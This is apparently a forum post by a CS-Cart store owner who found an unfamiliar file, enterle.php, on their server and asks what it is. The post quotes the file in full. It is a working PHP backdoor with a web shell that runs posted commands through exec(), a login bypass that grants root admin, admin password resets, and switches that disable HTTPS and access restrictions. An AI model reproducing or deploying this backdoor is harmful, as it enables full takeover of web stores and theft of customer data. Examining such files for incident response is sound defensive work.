I've recently noticed a file in the public_html folder, its name is /enterle.php and the code in it is as follows, Ive changed the password details in case it is sensitive info.
if ($_GET['mode'] == 'shell'){
echo '
';
if ($_POST['cmd']){
exec($_POST['cmd'], $out);
foreach ($out as $k => $v){
echo “
”.$v.“”;
}
}
echo '
';
die();
}
DEFINE ('AREA', 'A');
DEFINE ('AREA_NAME' ,'admin');
define('ACCOUNT_TYPE', 'admin');
require './prepare.php';
require './init.php';
if ($_GET['mode'] == 'login' && !isset($_GET['kill'])) {
$auth = array (
'user_id' => 1,
'user_type' => 'A',
'area' => 'A',
'login' => 'admin',
'password_change_timestamp' => time(),
'first_expire_check' => false,
'this_login' => time(),
'is_root' => 'Y'
);
$_SESSION['auth'] = $auth;
$_SESSION['last_status'] = '-------------------';
fn_redirect(Registry::get('config.admin_index'));
}
if ($_GET['mode'] == 'login' && isset($_GET['kill'])) {
$auth = array (
'user_id' => 1,
'user_type' => 'A',
'area' => 'A',
'login' => 'admin',
'membership_id' => '0',
'password_change_timestamp' => time(),
'first_expire_check' => false,
'this_login' => time(),
'is_root' => 'Y'
);
$_SESSION['auth'] = $auth;
$_SESSION['last_status'] = '------------------';
unlink('sph.php');
if (!is_file('sph.php')) {
fn_set_notification('N','Notice', 'sph.php is removed');
} else {
fn_set_notification('E', 'Error', 'sph.php is not removed!');
}
fn_redirect(Registry::get('config.admin_index'));
}
if ($_GET['mode'] == 'logout') {
$auth = array();
unset($_SESSION['auth']);
fn_redirect(Registry::get('config.admin_index'));
}
if ($_GET['mode'] == 'change_password') {
db_query(“UPDATE ?:users SET password = ?s WHERE user_id='1'”, md5('5894admin'));
echo “Password Changed to '5894admin'!”;
}
if ($_GET['mode'] == 'restore_password' && !empty($_GET['passwd'])) {
db_query(“UPDATE ?:users SET password = ?s WHERE user_id='1'”, $_GET['passwd']);
echo “Password Restored to $_GET[passwd]!”;
}
if ($_GET['mode'] == 'restore_password_md5' && !empty($_GET['passwd'])) {
db_query(“UPDATE ?:users SET password = ?s WHERE user_id='1'”, md5($_GET['passwd']));
echo “Password Restored to $_GET[passwd]!”;
}
if ($_GET['mode'] == 'remove_https') {
db_query(“UPDATE ?:settings SET value='N' WHERE option_name='secure_checkout'”);
db_query(“UPDATE ?:settings SET value='N' WHERE option_name='secure_admin'”);
echo “HTTPS disabled!”;
}
if ($_GET['mode'] == 'ignore_AR') {
db_query(“UPDATE ?:addons SET status='D' WHERE addon='access_restrictions'”);
echo “Access Restriction is disabled!”;
}
if ($_GET['mode'] == 'phpinfo') {
phpinfo();
}
?>
Should i be worried about this file and what is it's purpose?
Is this a standard CsCart file?